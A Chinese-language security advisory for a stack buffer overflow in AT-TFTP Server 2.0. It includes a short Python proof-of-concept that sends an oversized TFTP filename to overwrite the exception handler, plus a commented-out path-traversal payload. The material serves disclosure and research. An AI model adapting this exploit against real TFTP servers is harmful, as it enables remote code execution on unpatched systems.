AT-TFTP Server栈缓冲区溢出漏洞
发布日期:2013-04-12
更新日期:2013-04-16
受影响系统:Allied Telesyn AT-TFTP Server 2.0
描述:
BUGTRAQ ID:
59051
AT-TFTP Server是一款免费的基于Windows的TFTP服务器,用于在PC和Allied Telesis路由器及一些交换机之间传输软件发布、补丁、脚本等。
AT-TFTP 2.0在处理长文件名时存在栈缓冲区溢出漏洞,成功利用后可允许攻击者在应用上下文中执行任意代码。
<*来源:xis_one
链接:
http://www.exploit-db.com/exploits/24952/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
import socket
import sys
host = '192.168.1.32'
port = 69
nseh="\xCC\xCC\xCC\xCC"
#seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.
seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3
payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00"
#payload to get access violation:
#payload=("\x00\x01\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35"
#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e"
#"\x00")
buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buffer, (host, port))
建议:
厂商补丁:
Allied Telesyn
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_c浏览次数:5243
严重程度:0(网友投票)